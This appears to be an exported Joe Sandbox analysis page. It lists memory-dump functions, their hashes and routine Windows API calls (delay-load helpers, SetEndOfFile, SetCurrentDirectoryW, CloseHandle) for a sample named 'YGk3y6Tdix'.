Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7ba68011a00324dffbfcb32cc9155b2281e7a09a80a4dad64f1a8b613e3b344
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: b7ba68011a00324dffbfcb32cc9155b2281e7a09a80a4dad64f1a8b613e3b344
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e51b9107fe542c42de6cfe935f851c475d24ad4881861c14157bc951f33d2199
Instruction ID: cbafd5fc1183931e7d4aaa79f7746caecb0bad332ed486a2ddeb263d817b141b
Opcode Fuzzy Hash: e51b9107fe542c42de6cfe935f851c475d24ad4881861c14157bc951f33d2199
Instruction Fuzzy Hash: 54A011E22A80023C300822022C02CFB028EC0C0B20338802EF828A00C0AC8088003CB3

Function 00FBE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f30848f1a3b3c08094b560f97bf75a5335a32b438074d9e1c29b4dea7ff5ac48
Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
Opcode Fuzzy Hash: f30848f1a3b3c08094b560f97bf75a5335a32b438074d9e1c29b4dea7ff5ac48
Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3

Function 00FBE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e06abfeb9f6cfad37cdc23814633daac759f78595dd9fd81de42a0d176e34cbe
Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
Opcode Fuzzy Hash: e06abfeb9f6cfad37cdc23814633daac759f78595dd9fd81de42a0d176e34cbe
Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3

Function 00FBE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 007940b5afec130a5315dc929d6311da63d987ae2f59fe9d0a2210febda72bc9
Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
Opcode Fuzzy Hash: 007940b5afec130a5315dc929d6311da63d987ae2f59fe9d0a2210febda72bc9
Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3

Function 00FBE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1be4b995db0d26f6ae8dd6148dc2f78a83c076770bf3ea508b848056c660a4d5
Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
Opcode Fuzzy Hash: 1be4b995db0d26f6ae8dd6148dc2f78a83c076770bf3ea508b848056c660a4d5
Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3

Function 00FBE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5da8acc5aa1570816a22d36aa34a78693ae226c29ef1657dd7d0c4c3e5f26d20
Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
Opcode Fuzzy Hash: 5da8acc5aa1570816a22d36aa34a78693ae226c29ef1657dd7d0c4c3e5f26d20
Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3

Function 00FBE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 34cabe0900e3da4be2f54e91325a4517546b9841fc5b56db079f9df83fc06081
Instruction ID: 5fabdfa3beb15e1f33e89add7104b824ed160c62c0fb6a6e965a0d5607a01fdd
Opcode Fuzzy Hash: 34cabe0900e3da4be2f54e91325a4517546b9841fc5b56db079f9df83fc06081
Instruction Fuzzy Hash: 8FA011C22A8002BC300822A22C02CFB020EC8C0B20338882FF80AC00C0A88088203CB2

Function 00FBE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7aa77c7d4dd5bccb9a58e7325d2ae1a5b1632eaec0427408aa7c1aba9aba62f
Instruction ID: 5fabdfa3beb15e1f33e89add7104b824ed160c62c0fb6a6e965a0d5607a01fdd
Opcode Fuzzy Hash: a7aa77c7d4dd5bccb9a58e7325d2ae1a5b1632eaec0427408aa7c1aba9aba62f
Instruction Fuzzy Hash: 8FA011C22A8002BC300822A22C02CFB020EC8C0B20338882FF80AC00C0A88088203CB2

Function 00FBE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aeb76566d862076f70dec2518d7bb880bd2794d54f76671d530ba90122adcef0
Instruction ID: 7b6d4f3a16fa59a6b3194a61b96a9fd7b4050b570a0b14925a7b66606a226adb
Opcode Fuzzy Hash: aeb76566d862076f70dec2518d7bb880bd2794d54f76671d530ba90122adcef0
Instruction Fuzzy Hash: 93A011C22A80023C300822A22C02CFB020EC8C0B22338822FF808C00C0A88088203CB2

Function 00FBE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fae906150e1b278a92f683225a94c4e77dba710bc4613da4b1bd3786a50a5dd8
Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
Opcode Fuzzy Hash: fae906150e1b278a92f683225a94c4e77dba710bc4613da4b1bd3786a50a5dd8
Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2

Function 00FBE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d7cf7666b3b616bf148082f0484194177f33fcca3e0e9970739f6844b2f3dfa7
Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
Opcode Fuzzy Hash: d7cf7666b3b616bf148082f0484194177f33fcca3e0e9970739f6844b2f3dfa7
Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2

Function 00FBE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6aea5d2ff52eed79c609d6eaac89c139ef976dc141d45bab5943c8558b38dd21
Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
Opcode Fuzzy Hash: 6aea5d2ff52eed79c609d6eaac89c139ef976dc141d45bab5943c8558b38dd21
Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2

Function 00FBE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d97300a567145ade0b8177f6b9f7d027649d8e7f9430b2431d377a3f3e915e33
Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
Opcode Fuzzy Hash: d97300a567145ade0b8177f6b9f7d027649d8e7f9430b2431d377a3f3e915e33
Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2

Function 00FA9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00FA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FA9F0C

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 886cc875a295e9ac1b92ad373019760256761f678907cb5713917cac5266f012
Instruction ID: 27b580f8ea9a033786fd4bd99bb9bab8711d9b81eaec0298de910525fe0acc7a
Opcode Fuzzy Hash: 886cc875a295e9ac1b92ad373019760256761f678907cb5713917cac5266f012
Instruction Fuzzy Hash: 11A0223008000E8BCE022B30CE0C00C3B22FB20BC830082E8A00BCF0B2CB23880BEB02

Function 00FBAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00FBAE72,C:\Users\user\Desktop,00000000,00FE946A,00000006), ref: 00FBAC08

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 725b02643373b3409448f14157236bd87b75260519b883158c22318233e76ccd
Instruction ID: 5ed76f5faa4e9a188c5acceb7a583ba5dcfdafac3f78b62a1cc876aee1956157
Opcode Fuzzy Hash: 725b02643373b3409448f14157236bd87b75260519b883158c22318233e76ccd
Instruction Fuzzy Hash: C3A011302022028B82002B328F0AA0EBBAAAFA2B00F00C02AA20080030CB30C820BA02

Function 00FA9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00FA95D6,?,?,?,?,?,00FD2641,000000FF), ref: 00FA963B

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a3cae33c8b95446fba8438a2a0e2f1dcbd12a6c9cbbacf5bd239155aa08b80b5
Instruction ID: 00bac6dfe355c6e5a5a62ec7e0172c8c09e421300ba1fdae58a15318facefeec
Opcode Fuzzy Hash: a3cae33c8b95446fba8438a2a0e2f1dcbd12a6c9cbbacf5bd239155aa08b80b5
Instruction Fuzzy Hash: 63F0E9B0885B059FDB348A30C54879277E86F53331F040B2ED1F242AE0D3B465CDAA40

Non-executed Functions

